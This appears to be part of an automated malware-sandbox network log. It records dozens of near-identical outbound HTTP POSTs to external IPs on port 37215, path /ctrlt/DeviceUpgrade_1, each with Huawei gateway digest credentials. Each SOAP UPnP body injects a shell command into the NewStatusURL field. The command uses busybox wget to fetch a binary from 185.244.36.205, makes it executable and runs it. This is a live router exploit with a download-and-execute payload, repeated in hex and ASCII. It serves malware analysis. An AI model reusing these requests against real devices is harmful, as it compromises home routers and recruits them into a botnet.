                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1773192.168.2.155455645.131.206.11637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946418047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1774192.168.2.1558726102.201.144.23037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946433067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1775192.168.2.1539328222.15.127.17737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946441889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1776192.168.2.154897694.52.187.16337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946465969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1777192.168.2.1553860156.37.19.21537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946472883 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1778192.168.2.155886045.119.46.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946495056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1779192.168.2.1559132186.4.87.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946516991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1780192.168.2.1557996138.86.13.20837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946537971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1781192.168.2.155848631.190.38.15537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946554899 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1782192.168.2.1557558138.255.225.20737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946616888 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
